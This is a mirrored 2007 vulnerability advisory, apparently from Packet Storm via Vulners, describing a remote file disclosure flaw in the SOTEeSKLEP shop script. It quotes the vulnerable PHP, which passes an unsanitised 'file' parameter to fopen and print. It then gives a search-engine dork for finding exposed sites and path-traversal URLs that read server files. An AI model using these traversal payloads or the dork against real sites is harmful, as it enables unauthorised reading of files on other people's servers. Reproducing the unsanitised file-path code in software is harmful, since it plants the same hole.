Lucene search
K

soteesklep-disclose.txt

🗓️ 14 Aug 2007 00:00:00Reported by dunType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

SOTEeSKLEP Remote File Disclosure Vulnerability in Versions 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC

Code
`SOTEeSKLEP Remote File Disclosure Vulnerability  
  
Script : SOTEeSKLEP  
  
Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and i think other.  
  
Site : http://www.sote.pl  
  
Bug:  
  
...  
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }  
...  
$file_path="$DOCUMENT_ROOT/themes/_$config->lang/_html_files/$file";  
if (file_exists($file_path)) { $fd=fopen($file_path,"r");  
$data=fread($fd,filesize($file_path));  
print $data;  
fclose($fd);  
}  
...  
  
Dork: inurl:"/go/_files/?file="  
  
Examples:  
http://???/go/_files/?file=./.././.././.././  
http://???/go/_files/?file=./.././.././.././go/_files/index.php  
  
Discovered by dun  
2007.08.11  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation